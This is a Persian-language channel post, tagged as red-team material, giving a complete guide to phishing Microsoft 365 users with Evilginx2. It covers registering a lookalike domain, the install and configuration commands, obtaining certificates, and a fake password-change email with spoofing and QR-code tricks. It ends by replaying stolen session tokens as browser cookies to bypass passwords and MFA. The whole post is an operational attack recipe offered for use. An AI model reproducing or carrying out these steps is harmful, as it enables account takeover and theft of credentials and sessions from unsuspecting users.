مرحله ۱ ساخت یک سایت جعلی خیلی شبیه سایت اصلی مایکروسافت
کاری که میکنیم
یه دامنه تقلبی ثبت میکنیم مثلا
m1crosoft-support.com
به جای حرف i از عدد 1 استفاده کردیم
این دامنه باعث میشه کاربر فکر کنه وارد سایت اصلی مایکروسافته
دامنه رو از یه جایی میخریم که گواهی امنیتی رایگان HTTPS میده مثل
Namecheap
Porkbun
تنظیم میکنیم که این دامنه به سرور ما VPS وصل بشه
مرحله ۲ راهاندازی ابزار Evilginx2 روی سرور
Evilginx2 یه ابزار فیشینگ حرفهایه که کمک میکنه بدون نیاز به رمز یا MFA توکن ورود Session Token قربانی رو بدزدیم
ما یک سرور مجازی میخوایم یه ایپی پابلیک داشته باشه
نصب ابزارها با دستور
sudo apt update && sudo apt install git make gcc certbot -y
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo ./bin/evilginx
تنظیمات اولیه برای دامنه
config domain m1crosoft-support.com
config ip آی پی سرور شما
config redirect_url https://login.microsoftonline.com
config site microsoft
enable microsoft
گرفتن گواهی امنیتی HTTPS رایگان
sudo certbot certonly --manual -d m1crosoft-support.com --preferred-challenges dns
و بعد فایلهای امنیتی رو به Evilginx2 معرفی میکنیم
config certpath /etc/letsencrypt/live/m1crosoft-support.com/fullchain.pem
config keypath /etc/letsencrypt/live/m1crosoft-support.com/privkey.pem
مرحله ۳ فرستادن ایمیل جعلی فیشینگ به کاربر هدف
هدف اینه که کاربر روی لینک جعلی کلیک کنه
نمونه متن ایمیل میتونه به این صورت باشه
موضوع : مهم تغییر اجباری رمز حساب Microsoft 365
کاربر گرامی
برای امنیت بیشتر حساب شما لطفا با کلیک روی لینک زیر رمز عبور خود را تغییر دهید
https://m1crosoft-support com/auth
ترفندهایی که میتونیم بزنیم:
جعل فرستنده ایمیل طوری که از طرف Microsoft به نظر برسه
استفاده از لینکهای کوتاه یا QR Code برای پنهان کردن لینک جعلی
ارسال ایمیل در ساعات اداری برای افزایش احتمال کلیک
مرحله ۴ دزدیدن Session Token بعد از کلیک کاربر
وقتی کاربر روی لینک کلیک میکنه
سایت جعلی ما باز میشه
Evilginx2 اطلاعات ورود کاربر رو میگیره ولی همزمان کاربر واقعا وارد Microsoft میشه
در پشت صحنه ما توکنهای ورود Session Token رو از مرورگر کاربر میگیریم
مثلا چیزی شبیه این توی لاگها ظاهر میشه
Captured new credentials
Username [email protected]
Session Tokens {...}
مرحله ۵ ورود به حساب Microsoft 365 بدون رمز یا MFA
الان که توکنها رو داریم نیازی به رمز عبور یا تایید MFA نیست
برای استفاده از توکن
مرورگر مثلا Chrome رو باز کن
یه تب مخفی incognito باز کن
برو به DevTools F12 تب Application بخش Cookies
مقادیر توکن کاربر که از Evilginx گرفتی رو به کوکیها اضافه کن
صفحه Microsoft 365 رو ریفرش کن
ورود موفقیت آمیز بدون رمز و بدون MFA انجام میشه
#red_team
#phising
#Evilginx2
⚜️ @Expire_Security ⚜️

